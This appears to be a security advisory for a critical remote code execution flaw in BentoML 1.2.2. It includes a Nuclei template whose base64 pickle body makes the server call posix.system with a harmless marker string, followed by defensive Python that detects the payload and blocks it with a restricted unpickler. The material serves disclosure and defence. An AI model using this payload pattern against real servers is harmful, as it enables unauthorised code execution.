Remote Code Execution via Insecure Deserialization in BentoML
BentoML version 1.2.2 is vulnerable to remote code execution (RCE) through insecure deserialization: an attacker can execute arbitrary code by sending a single malicious POST request whose pickled body the server deserializes. This vulnerability was patched in version 1.2.5.
Available publicly on Apr 16 2024 | Available with Premium on Mar 25 2024
Nuclei Template
id: bentoml-rce

info:
  name: BentoML Insecure Deserialization RCE Simulation
  author: DanMcInerney, byt3bl33d3r, pinkdraconian
  severity: critical
  description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. The binary body is a pickle that, when loaded, calls posix.system with the string "protectai" (not a real command; it serves only as a marker).
  reference:
    - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-1188 # Insecure Default Initialization of Resource
  tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning

requests:
  - method: POST
    path:
      - "{{BaseURL}}/summarize"
    headers:
      Content-Type: "application/vnd.bentoml+pickle"
    body: !!binary |
      gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4=
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Input should be a valid dictionary or instance of Input"
        part: body
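The template above works because the server hands an attacker-controlled body straight to the pickle loader, and pickle resolves and calls whatever global the stream names. The following is an added example, not code from the page, from BentoML or from the template authors, showing the two defensive checks a service that must accept pickled input would apply: a static opcode walk that lists the globals a stream would import without executing it, and a restricted unpickler whose `find_class` refuses anything outside an allowlist, which is consulted before the `REDUCE` opcode that would invoke the object. The template's own body is decoded to show it is caught; the `SAFE_GLOBALS` allowlist, the `triage_pickle_body` function and the "summarize this" input are constructed for this example.

```python
import base64
import io
import pickle
import pickletools

# Request body carried by the Nuclei template above (copied from the page, not constructed).
TEMPLATE_BODY_B64 = "gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4="

# Content type the template sends; the server selects its pickle input path from it.
PICKLE_CONTENT_TYPE = "application/vnd.bentoml+pickle"

# Hypothetical allowlist of globals an input-deserialisation path legitimately needs.
# Anything else (posix/os, subprocess, builtins.eval, ...) is refused before it can run.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
}

# Pickle opcodes that push a text string onto the stack (protocols 0 through 5).
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def template_payload() -> bytes:
    """The raw pickle bytes the template posts."""
    return base64.b64decode(TEMPLATE_BODY_B64)


def make_benign_body(obj) -> bytes:
    """Serialise an ordinary input object the way a legitimate client would."""
    return pickle.dumps(obj, protocol=4)


def referenced_globals(data: bytes) -> list:
    """Static scan: (module, name) pairs the stream would import, without executing it.

    STACK_GLOBAL (protocol 4+) takes module and name from the two preceding string
    pushes; GLOBAL/INST (older protocols) carry "module name" as their argument.
    This is a disassembler walk, not a full stack machine, so it is a triage aid
    rather than a replacement for RestrictedUnpickler below.
    """
    strings = []
    found = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
        elif op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted globals.

    find_class runs for every GLOBAL/STACK_GLOBAL opcode, which precedes the REDUCE
    that would call the object, so raising here stops the stream before any call.
    """

    def find_class(self, module: str, name: str):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def triage_pickle_body(content_type: str, body: bytes) -> tuple:
    """Decide what to do with an inbound body (constructed helper for this example).

    Returns ("skipped", reason) for non-pickle bodies, ("rejected", reason) when the
    stream names a forbidden global, or ("accepted", object) after a restricted load.
    """
    if content_type != PICKLE_CONTENT_TYPE:
        return ("skipped", f"not a pickle body: {content_type!r}")
    bad = [g for g in referenced_globals(body) if g not in SAFE_GLOBALS]
    if bad:
        return ("rejected", f"pickle references forbidden globals {bad}")
    try:
        return ("accepted", restricted_loads(body))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print("globals in template body:", referenced_globals(template_payload()))
    print(triage_pickle_body(PICKLE_CONTENT_TYPE, template_payload()))
    print(triage_pickle_body(PICKLE_CONTENT_TYPE, make_benign_body({"text": "summarize this"})))
```

Running the block prints `[('posix', 'system')]` for the template body and a `rejected` verdict for it, while a plain dictionary input is accepted. On a server where pickled input is not needed at all, the stronger fix is to refuse the pickle content type outright rather than to filter it.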